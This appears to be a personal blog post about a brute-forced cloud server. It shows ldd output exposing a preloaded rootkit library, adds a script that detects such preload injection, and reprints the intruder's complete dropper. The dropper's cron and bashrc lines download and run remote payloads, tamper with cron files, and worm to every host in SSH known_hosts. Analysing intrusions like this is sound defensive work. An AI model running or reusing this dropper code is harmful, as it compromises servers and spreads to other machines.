I had just bought a Tencent Cloud server and, since I only wanted to run a quick performance test, set nothing more than a simple password. It was brute-forced within minutes.

After logging in I found the CPU load was high, but top could not show which process was consuming the CPU. Following this article, I used ldd to inspect the shared libraries loaded by top, ps and vmstat, and all three turned out to contain the same suspicious /usr/local/lib/libevent_core-0.12.so:
```
# ldd `which top`
	linux-vdso.so.1 =>  (0x00007ffe21bc7000)
	/usr/local/lib/libevent_core-0.12.so (0x00007ff594420000)
	libprocps.so.4 => /lib64/libprocps.so.4 (0x00007ff5941f9000)
	libsystemd.so.0 => /lib64/libsystemd.so.0 (0x00007ff593fc8000)
	libncurses.so.5 => /lib64/libncurses.so.5 (0x00007ff593da1000)
	libtinfo.so.5 => /lib64/libtinfo.so.5 (0x00007ff593b77000)
	libdl.so.2 => /lib64/libdl.so.2 (0x00007ff593973000)
	libc.so.6 => /lib64/libc.so.6 (0x00007ff5935a5000)
	libcap.so.2 => /lib64/libcap.so.2 (0x00007ff5933a0000)
	libm.so.6 => /lib64/libm.so.6 (0x00007ff59309e000)
	librt.so.1 => /lib64/librt.so.1 (0x00007ff592e96000)
	libselinux.so.1 => /lib64/libselinux.so.1 (0x00007ff592c6f000)
	liblzma.so.5 => /lib64/liblzma.so.5 (0x00007ff592a49000)
	liblz4.so.1 => /lib64/liblz4.so.1 (0x00007ff592834000)
	libgcrypt.so.11 => /lib64/libgcrypt.so.11 (0x00007ff5925b3000)
	libgpg-error.so.0 => /lib64/libgpg-error.so.0 (0x00007ff5923ae000)
	libresolv.so.2 => /lib64/libresolv.so.2 (0x00007ff592195000)
	libdw.so.1 => /lib64/libdw.so.1 (0x00007ff591f44000)
	libgcc_s.so.1 => /lib64/libgcc_s.so.1 (0x00007ff591d2e000)
	libpthread.so.0 => /lib64/libpthread.so.0 (0x00007ff591b12000)
	/lib64/ld-linux-x86-64.so.2 (0x00007ff594626000)
	libattr.so.1 => /lib64/libattr.so.1 (0x00007ff59190d000)
	libpcre.so.1 => /lib64/libpcre.so.1 (0x00007ff5916ab000)
	libelf.so.1 => /lib64/libelf.so.1 (0x00007ff591493000)
	libz.so.1 => /lib64/libz.so.1 (0x00007ff59127d000)
	libbz2.so.1 => /lib64/libbz2.so.1 (0x00007ff59106d000)

# ldd `which ps`
	linux-vdso.so.1 =>  (0x00007ffe8214a000)
	/usr/local/lib/libevent_core-0.12.so (0x00007f49ddc38000)
	libprocps.so.4 => /lib64/libprocps.so.4 (0x00007f49dda11000)
	libsystemd.so.0 => /lib64/libsystemd.so.0 (0x00007f49dd7e0000)
	libdl.so.2 => /lib64/libdl.so.2 (0x00007f49dd5dc000)
	libc.so.6 => /lib64/libc.so.6 (0x00007f49dd20e000)
	libcap.so.2 => /lib64/libcap.so.2 (0x00007f49dd009000)
	libm.so.6 => /lib64/libm.so.6 (0x00007f49dcd07000)
	librt.so.1 => /lib64/librt.so.1 (0x00007f49dcaff000)
	libselinux.so.1 => /lib64/libselinux.so.1 (0x00007f49dc8d8000)
	liblzma.so.5 => /lib64/liblzma.so.5 (0x00007f49dc6b2000)
	liblz4.so.1 => /lib64/liblz4.so.1 (0x00007f49dc49d000)
	libgcrypt.so.11 => /lib64/libgcrypt.so.11 (0x00007f49dc21c000)
	libgpg-error.so.0 => /lib64/libgpg-error.so.0 (0x00007f49dc017000)
	libresolv.so.2 => /lib64/libresolv.so.2 (0x00007f49dbdfe000)
	libdw.so.1 => /lib64/libdw.so.1 (0x00007f49dbbad000)
	libgcc_s.so.1 => /lib64/libgcc_s.so.1 (0x00007f49db997000)
	libpthread.so.0 => /lib64/libpthread.so.0 (0x00007f49db77b000)
	/lib64/ld-linux-x86-64.so.2 (0x00007f49dde3e000)
	libattr.so.1 => /lib64/libattr.so.1 (0x00007f49db576000)
	libpcre.so.1 => /lib64/libpcre.so.1 (0x00007f49db314000)
	libelf.so.1 => /lib64/libelf.so.1 (0x00007f49db0fc000)
	libz.so.1 => /lib64/libz.so.1 (0x00007f49daee6000)
	libbz2.so.1 => /lib64/libbz2.so.1 (0x00007f49dacd6000)

# ldd `which vmstat`
	linux-vdso.so.1 =>  (0x00007ffd99ce3000)
	/usr/local/lib/libevent_core-0.12.so (0x00007fdf0f4cb000)
	libprocps.so.4 => /lib64/libprocps.so.4 (0x00007fdf0f2a4000)
	libsystemd.so.0 => /lib64/libsystemd.so.0 (0x00007fdf0f073000)
	libdl.so.2 => /lib64/libdl.so.2 (0x00007fdf0ee6f000)
	libc.so.6 => /lib64/libc.so.6 (0x00007fdf0eaa1000)
	libcap.so.2 => /lib64/libcap.so.2 (0x00007fdf0e89c000)
	libm.so.6 => /lib64/libm.so.6 (0x00007fdf0e59a000)
	librt.so.1 => /lib64/librt.so.1 (0x00007fdf0e392000)
	libselinux.so.1 => /lib64/libselinux.so.1 (0x00007fdf0e16b000)
	liblzma.so.5 => /lib64/liblzma.so.5 (0x00007fdf0df45000)
	liblz4.so.1 => /lib64/liblz4.so.1 (0x00007fdf0dd30000)
	libgcrypt.so.11 => /lib64/libgcrypt.so.11 (0x00007fdf0daaf000)
	libgpg-error.so.0 => /lib64/libgpg-error.so.0 (0x00007fdf0d8aa000)
	libresolv.so.2 => /lib64/libresolv.so.2 (0x00007fdf0d691000)
	libdw.so.1 => /lib64/libdw.so.1 (0x00007fdf0d440000)
	libgcc_s.so.1 => /lib64/libgcc_s.so.1 (0x00007fdf0d22a000)
	libpthread.so.0 => /lib64/libpthread.so.0 (0x00007fdf0d00e000)
	/lib64/ld-linux-x86-64.so.2 (0x00007fdf0f6d1000)
	libattr.so.1 => /lib64/libattr.so.1 (0x00007fdf0ce09000)
	libpcre.so.1 => /lib64/libpcre.so.1 (0x00007fdf0cba7000)
	libelf.so.1 => /lib64/libelf.so.1 (0x00007fdf0c98f000)
	libz.so.1 => /lib64/libz.so.1 (0x00007fdf0c779000)
	libbz2.so.1 => /lib64/libbz2.so.1 (0x00007fdf0c569000)
```
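What gives the injected library away in the output above is its position and form: a shared object that ldd prints as a bare absolute path with no `=>`, listed before the binary's own dependencies, was not requested by the binary at all. It was forced in by the dynamic loader, which on Linux normally means an entry in /etc/ld.so.preload (or an LD_PRELOAD variable). A library loaded that way into every process can filter what top and ps read from /proc, which is exactly why the CPU consumer was invisible. The script below is an added example, not code from the original post or from the articles it cites: it parses ldd output with that rule and, with `--live`, applies it to the process-inspection tools on the current host. The sample ldd output is constructed (shortened from the post's top listing) and the list of tools checked is an assumption.

```sh
#!/bin/sh
# Added example (not from the original post): detect shared objects that the
# dynamic loader injected into process-inspection tools, as seen in the ldd
# output above. Assumption: ldd prints an injected object as a bare absolute
# path with no "=>", exactly like the libevent_core-0.12.so line in the post.

# Read ldd output on stdin; print objects that were not resolved through "=>",
# ignoring the dynamic loader itself, which ldd also prints as a bare path.
find_preloaded() {
    awk 'substr($1, 1, 1) == "/" && $2 != "=>" && $1 !~ /ld-linux|ld-musl/ { print $1 }'
}

# Constructed samples, shortened from the post's output of `ldd $(which top)`.
SAMPLE_INFECTED='linux-vdso.so.1 =>  (0x00007ffe21bc7000)
/usr/local/lib/libevent_core-0.12.so (0x00007ff594420000)
libprocps.so.4 => /lib64/libprocps.so.4 (0x00007ff5941f9000)
libc.so.6 => /lib64/libc.so.6 (0x00007ff5935a5000)
/lib64/ld-linux-x86-64.so.2 (0x00007ff594626000)'

SAMPLE_CLEAN='linux-vdso.so.1 =>  (0x00007ffe21bc7000)
libprocps.so.4 => /lib64/libprocps.so.4 (0x00007ff5941f9000)
libc.so.6 => /lib64/libc.so.6 (0x00007ff5935a5000)
/lib64/ld-linux-x86-64.so.2 (0x00007ff594626000)'

# Live check: /etc/ld.so.preload is the usual injection point, then each tool
# an intruder wants to blind (tool list is an assumption). Always exits 0 so it
# can be run in a loop over many hosts; findings are printed as WARNING lines.
check_host() {
    if [ -s /etc/ld.so.preload ]; then
        echo "WARNING: /etc/ld.so.preload exists:"
        cat /etc/ld.so.preload
    fi
    for tool in top ps vmstat ls netstat ss lsof; do
        bin=$(command -v "$tool" 2>/dev/null) || continue
        hits=$(ldd "$bin" 2>/dev/null | find_preloaded)
        if [ -n "$hits" ]; then
            printf 'WARNING: %s loads injected object(s):\n%s\n' "$bin" "$hits"
        fi
    done
    return 0
}

# Demonstration on the constructed sample; pass --live to inspect this host.
printf '%s\n' "$SAMPLE_INFECTED" | find_preloaded
if [ "${1:-}" = "--live" ]; then
    check_host
fi
```

Run as `sh preload_check.sh --live` on the suspect host. If /etc/ld.so.preload turns up, also look at `lsattr /etc/ld.so.preload`: droppers of this kind frequently set the immutable bit on the files they plant (the script later in this post runs `chattr -i` on the cron files for the same reason), so a plain `rm` will fail until the attribute is cleared. Because ldd itself runs the loader, the safest reading comes from a clean rescue environment or from a statically linked copy of the tools.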
Later I found another article describing an intrusion exactly like the one I had run into. The relevant files are as follows.

In /etc/bashrc:

```
(curl -fsSL -m180 aliyun.one||wget -q -T180 -O- aliyun.one||python -c 'import urllib;exec(urllib.urlopen("http://aliyun.one/pygo").read())')|sh >/dev/null 2>&1 &
```
In /var/spool/cron/root:

```
*/15 * * * * (curl -fsSL -m180 aliyun.one||wget -q -T180 -O- aliyun.one||python -c 'import urllib;print(urllib.urlopen("http://aliyun.one").read())')|sh
```

The attacker had inserted malicious code into both files; its purpose is to fetch the following script and execute it through the shell:
```
#<script>window.location.href="http://aliyun.com";</script><!--
export PATH=$PATH:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin
mv /bin/wge /bin/wget
mv /bin/cur /bin/curl
mv /usr/bin/wge /usr/bin/wget
mv /usr/bin/cur /usr/bin/curl
mkdir -p /tmp
chmod 1777 /tmp
echo "*/10 * * * * (curl -fsSL -m180 aliyun.one||wget -q -T180 -O- aliyun.one||python -c 'import urllib;print(urllib.urlopen(\"http://aliyun.one\").read())')|sh"|crontab -
cat > /etc/crontab <<EOF
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
*/10 * * * * root (curl -fsSL -m180 aliyun.one||wget -q -T180 -O- aliyun.one||python -c 'import urllib;print(urllib.urlopen("http://aliyun.one").read())'||/usr/local/sbin/76572670a3)|sh
EOF
swapoff -a
find /etc/cron*|xargs chattr -i
find /var/spool/cron*|xargs chattr -i
grep -RE "(wget|curl)" /etc/cron*|grep -v "aliyun.one"|cut -f 1 -d :|xargs rm -rf
grep -RE "(wget|curl)" /var/spool/cron*|grep -v "aliyun.one"|cut -f 1 -d :|xargs rm -rf
netstat -anp|grep :::6345|awk '{print $7}'|sed -e "s/\/.*//g"|xargs kill -9
netstat -anp|grep 119.9.76.107:443|awk '{print $7}'|sed -e "s/\/.*//g"|xargs kill -9
cd /tmp
touch /usr/local/bin/writeablex && cd /usr/local/bin/
touch /usr/libexec/writeablex && cd /usr/libexec/
touch /usr/bin/writeablex && cd /usr/bin/
rm -rf /usr/local/bin/writeablex /usr/libexec/writeablex /usr/bin/writeablex
export PATH=$PATH:$(pwd)
a64="img.sobot.com/chatres/89/msg/20191225/1/ec0991da601e45c4b0bb6178da5f0cc4.png"
a32="img.sobot.com/chatres/89/msg/20191225/1/50659157a100466a88fed550423a38ee.png"
b64="cdn.xiaoduoai.com/cvd/dist/fileUpload/1577269944760/2.637890910155951.png"
b32="cdn.xiaoduoai.com/cvd/dist/fileUpload/1577269966297/8.872362655092918.png"
c64="https://user-images.githubusercontent.com/56861392/71443284-08acf200-2745-11ea-8ef3-509d9072d970.png"
c32="https://user-images.githubusercontent.com/56861392/71443285-08acf200-2745-11ea-96c3-0c2be9135085.png"
if [ ! -f "76572670a3" ]; then
    ARCH=$(getconf LONG_BIT)
    if [ ${ARCH}x = "64x" ]; then
        (curl -fsSL -m180 $a64 -o 76572670a3||wget -T180 -q $a64 -O 76572670a3||python -c 'import urllib;urllib.urlretrieve("http://'$a64'", "76572670a3")'||curl -fsSL -m180 $b64 -o 76572670a3||wget -T180 -q $b64 -O 76572670a3||python -c 'import urllib;urllib.urlretrieve("http://'$b64'", "76572670a3")'||curl -fsSL -m180 $c64 -o 76572670a3||wget -T180 -q $c64 -O 76572670a3||python -c 'import urllib;urllib.urlretrieve("'$c64'", "76572670a3")')
    else
        (curl -fsSL -m180 $a32 -o 76572670a3||wget -T180 -q $a32 -O 76572670a3||python -c 'import urllib;urllib.urlretrieve("http://'$a32'", "76572670a3")'||curl -fsSL -m180 $b32 -o 76572670a3||wget -T180 -q $b32 -O 76572670a3||python -c 'import urllib;urllib.urlretrieve("http://'$b32'", "76572670a3")'||curl -fsSL -m180 $c32 -o 76572670a3||wget -T180 -q $c32 -O 76572670a3||python -c 'import urllib;urllib.urlretrieve("'$c32'", "76572670a3")')
    fi
fi
chmod +x 76572670a3
$(pwd)/76572670a3 || ./76572670a3 || /usr/bin/76572670a3 || /usr/libexec/76572670a3 || /usr/local/bin/76572670a3 || 76572670a3 || /tmp/76572670a3 || /usr/local/sbin/76572670a3
if [ -f /root/.ssh/known_hosts ]; then
    for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do
        ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h "(curl -fsSL aliyun.one||wget -q -O- aliyun.one||python -c 'import urllib;print(urllib.urlopen(\"http://aliyun.one\").read())')|sh >/dev/null 2>&1 &"
    done
fi
for file in /home/*
do
    if test -d $file; then
        if [ -f $file/.ssh/known_hosts ]; then
            for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" $file/.ssh/known_hosts); do
                ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h "(curl -fsSL aliyun.one||wget -q -O- aliyun.one||python -c 'import urllib;print(urllib.urlopen(\"http://aliyun.one\").read())')|sh >/dev/null 2>&1 &"
            done
        fi
    fi
done
#-->
```
Even worse, the script scans the local .ssh/known_hosts files and uses them to spread the malicious code further!
Thanks for reading :)